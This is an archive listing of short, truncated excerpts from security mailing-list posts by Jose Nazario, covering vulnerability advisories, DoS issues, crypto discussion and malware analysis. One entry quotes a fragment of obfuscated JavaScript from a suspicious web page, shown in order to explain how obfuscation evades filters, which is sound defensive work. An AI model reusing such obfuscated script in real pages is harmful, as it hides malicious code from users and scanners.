Re: Flaw in Firefox 2.0 RC2

2006-10-17 Thread Jose Nazario
On Tue, 17 Oct 2006, [EMAIL PROTECTED] wrote: http://lcamtuf.coredump.cx/ffoxdie.html this exploit still works with the latest Firefox 2.0 RC3 also caused FFox 1.5.0.7 on OS X i386 to die. jose nazario, ph.d. [EMAIL PROTECTED] http://monkey.org/~jose/http

Re: SSH attacks - anyone else seen these?

2007-10-16 Thread Jose Nazario
ch in part. ____ jose nazario, ph.d. http://monkey.org/~jose/

Re: what is this?

2008-01-14 Thread Jose Nazario
have some form of js obfuscation going on). i hope this helps. ____ jose nazario, ph.d. http://monkey.org/~jose/

Two Problems in IMP 2

2000-04-25 Thread Jose Nazario
supported by IMP, MSWordView Severity: Moderate -- anyone can view Word document attachments processed by IMP/MSWordView, users can fill up the disk and DoS the IMP server Author: Jose Nazario ([EMAIL PROTECTED]) Vendor Status: Contacted, fix

Crimelabs Paper: Passive System Fingerprinting using Network Client Applications

2001-01-17 Thread jose nazario
welcome. this was originally submitted to Summercon '01 in Amsterdam, but was not accepted. perhaps i'll shop it around after some further tweaking. the paper follows my .sig, ____ jose nazario [EMAIL PROTECTED] Passive System Fingerprinting using Netw

Re: SuSe / Debian man package format string vulnerability

2001-02-04 Thread Jose Nazario
you trick them into processing an untrusted and untrustworthy .mc file. ________ jose nazario [EMAIL PROTECTED] PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80

SSHD-1 Logging Vulnerability

2001-02-05 Thread jose nazario
-1 Versions: At least ssh-1.2.27 and 1.2.30 Not Affected: OpenSSH Severity: Medium to High Author: Jose Nazario <[EMAIL PROTECTED]> Website: http://www.crimelabs.net/ Vendor Status: Contacted 1 February, 2001

Re: Multi format string bugs in IPAD x.x ftp server

2001-02-20 Thread Jose Nazario
y i don't have an IPAD box to test it on (care to share one?) but try that out. it's been the real problem before. ____ jose nazario [EMAIL PROTECTED] PGP: 89 B0 81 DA

Re: inetd DoS exploit

2001-02-27 Thread Jose Nazario
these features. at least the last time i looked at the code (eons ago) it did. 3] move to xinetd or other similar programs which have rate limiting. solar designer has a neat-o patch for xinetd that can do max-per-IP limits. very nice ... :) anyhow, old, mitigations are already in place, just le

Re: single-DES phase 1

2001-02-28 Thread Jose Nazario
t be available on the consumer market for some time. i'm just not comfortable with DES for the obvious reasons, and 3DES seems to have its occasional implementation problem, as well. (in the meantime i have been using OpenBSD IPSec VPNs with Blowfish encryption.)

Re: ssh environment - circumvention of restricted shells

2002-06-27 Thread Jose Nazario
http://www.heiho.net/bbs100/bbs_shell.txt hope that helps some people solve a part of this problem. i agree totally with markus, though, that the real issues are configuration errors. ___ jose nazario, ph.d. [EMAIL PROTECTED]

Re: VNC authentication weakness

2002-07-26 Thread Jose Nazario
i'm missing something, but why not pull a PRNG seed from /dev/random? _______ jose nazario, ph.d. [EMAIL PROTECTED] http://www.monkey.org/~jose/

Re: It takes two to tango

2002-07-31 Thread Jose Nazario
t of many recent discussions, including standards drafts. no excuses for not attempting to adhere to these best practices for either side of the issue. _______ jose nazario, ph.d. [EMAIL PROTECTED] http://www.monkey.org/~jose/

trillian DoS: trillian 1.0 pro also vulnerable

2002-09-18 Thread Jose Nazario
filter) identd on that host. enjoy. ___ jose nazario, ph.d. [EMAIL PROTECTED] http://www.monkey.org/~jose/

solaris 2.6, 7 yppasswd vulnerability

2001-05-28 Thread Jose Nazario
hanks. jose nazario [EMAIL PROTECTED] PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80 PGP key ID 0xFD37F4E5 (pgp.mit.edu) Vulnerability R

Sun Security Bulletin #00203 (fwd) (yppasswd/ypbind)

2001-07-05 Thread Jose Nazario
available, they appear to be. thanks. ____ jose nazario [EMAIL PROTECTED] PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80 PGP key ID 0xFD37F4E5 (pgp.mit.edu)

Re: remote DoS against inetd and ssh

1999-09-10 Thread Jose Nazario
ectivity and are vulnerable to this annoying DoS. sincerely, jose nazario [EMAIL PROTECTED] PGP 2.6.2 key fingerprint: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80 Public key available at http://biocserver.cwru.edu/~jose/pgp-key.asc

Re: Arbor Networks Peakflow SP web interface XSS

2012-04-04 Thread Jose Nazario
use the address secur...@arbor.net to establish communications. Arbor Networks takes these reports very seriously and seeks to work with security researchers when possible to remedy any such issue. - jose nazario, ph.d

Re: Arbor Networks Peakflow SP web interface XSS

2012-04-05 Thread Jose Nazario
. - jose nazario, ph.d. manager of security research arbor networks v: (734) 821 1427 http://asert.arbor.net/

Re: PHP security (or the lack thereof)

2006-06-17 Thread Jose Nazario
s that have had security bulletins over the years. i'm sure a few more languages could easily be added to that list. bear in mind i'm no PHP (or Perl, or C) bigot. but really, if you're going to complain about PHP, at least make your argument on reasonable grounds. jo

Re: BlackWorm naming confusing [CME entry now available]

2006-01-30 Thread Jose Nazario
On Tue, 24 Jan 2006, Gadi Evron wrote: > The CME entry should appear on their site shortly: > http://cme.mitre.org it already has, several days ago in fact: http://cme.mitre.org/data/list.html#24 ____ jose nazario, ph.d. [EMAIL PROTECTED] http://monkey.org

Re: Java script exploit

2006-02-18 Thread Jose Nazario
{w|=3D(t[x.charCodeAt(p++)-48])<>=3D8;s-=3D2}else{s=3D6}}document.write(r)}}dc('wfNDs5kfAsYOsLkoHSrcj0bqiRbvJGbvF96vK3Qqrzbq4h8aHukE3Ugc82waGEgDFUkoj9woifNDs5kfAMT'))"> jose nazario, ph.d. [EMAIL PROTECTED] http://monkey.org/~jose/ http://infosecdaily.net/ http://www.wormblog.com/

Re: Java script exploit

2006-02-18 Thread Jose Nazario
fuscated) this is what your browser would see and load. unless your spam/scam detection engine also ran the javascript, it wouldn't see that. hence, obfuscation. hopefully this helps people out there decode questionable javascript in the future. jose nazario, ph.d.

Re: FreeBSD Security Advisory FreeBSD-SA-06:13.sendmail

2006-03-22 Thread Jose Nazario
he FTP server to be read. jose nazario, ph.d. [EMAIL PROTECTED] http://monkey.org/~jose/ http://infosecdaily.net/ http://www.wormblog.com/